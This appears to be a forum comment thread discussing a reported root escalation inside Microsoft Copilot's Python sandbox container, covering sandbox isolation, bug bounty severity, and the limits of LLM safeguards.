It turned out not to really matter, because the container itself was still secured - you couldn't make network requests from it and you couldn't break out of it, so really all you could do with root was mess up a container that only you had access to anyway.
Are there any known unfixed container breakouts at the moment in the kind of systems Microsoft are likely to be using here?
Sometimes the (completion randomly selected from the outputs of the) predictive text model goes "yes, and". Other times, it goes "no, because". As observed in the article, if it's autocompleting the result of many "yes, and"s, the story is probably going to have another "yes, and" next, but if a story starts off with a certain kind of demand, it's probably going to continue with a refusal.
I read "rooted copilot" and I think they got root on a vm that is core to copilot itself.
A much more accurate title would be "How We Rooted the Copilot Python Sandbox"
it’s a nothing burger, which actually goes to show just how effective sandboxing is for defense in depth.
LLM is like an insane quadruple agent and you dont know whose side it is on (if any at all)
I'm telling it because I work there and I don't recognize any of those processes.
In fact I found one script named keepAliveJupyterSvc.sh in a public repo: https://github.com/shivamkm07/code-interpreter/blob/load-tes...
Guys, chatbots are mostly token generators, they don't run programs e give you responses...it's not a simple shell program, it computes things in GPU and return tokens, in which are translated back to English.
This is literally the same.
The safety in the system is that the code is executed in a container.
Sounds fake. LLMs don't usually memorize things that appear once in their training set anyway, nor have I heard about major issues accidentally training on a bunch of non-public data.
I can see how someone would believe it to be true though, since LLMs can easily hallucinate in a way that looks like this is true.
Using that information for trading is illegal, but so is exposing that information outside of approved channels.
Whatever the case, the only time people look at your social media history is to look for attacks and the only reason they will look at a company's slack messages and emails are to look for attacks during discovery.
I would argue that company secrets are mostly useless for the company but very, very useful to other companies. For this reason, there should be retention policy of a day or two for almost all communication unless it is important, required by law, or documentation. And, definitely do not share that information with the public without good reason.
Startups are probably most vulnerable as they are likely to use more "pet" techniques for infra, like SSH open to any IP to make changes.
Of course it depends what secrets. 99% will just be internal process drivel and inter departmental bickering but there's some real important stuff in there too.
Something like the top screenshot here, though:
https://www.zdnet.com/article/chatgpt-can-leak-source-data-v...
(not parent commenter but) tl;dr no
There was a boba tea company that had a free, no-sign-in required LLM that I used to generate a few bash scripts before ChatGPT free-tier started.
https://en.wikipedia.org/wiki/Setuid
> We reported the vulnerability to Microsoft in April and they have since fixed it as a moderate severity vulnerability. As only important and critical vulnerabilities qualify for a bounty award, we did not receive anything, except for an acknowledgement on the Security Researcher Acknowledgments for Microsoft Online Services webpage.
I guess it makes sense that a poor little indie company like Microsoft can't pay bug bounties. Surely no bad things will come out of this. > Now what have we gained with root access to the container?
> Absolutely nothing!
> We can now use this access to explore parts of the container that were previously inaccessible to us. We explored the filesystem, but there were no files in /root, no interesting logging to find, and a container breakout looked out of the question as every possible known breakout had been patched.
I'm sure there are more ways to acquire root. If Microsoft pays out for one, they have to pay out for all, and it seems pretty silly to do that for something that's slightly unintended but not dangerous. > a container breakout looked out of the question as every possible known breakout had been patched
This is the part that concerns me. It only encourages an attacker to sit on an exploit like this until a new container breakout is discovered.System prompt going out of context window maybe?
This is your regular reminder that in-LLM safeguards never work. At best they can be used to give prettier messages about hard security boundaries on tool calls.
That time produced qmail and postfix. We are back to the early 1990s.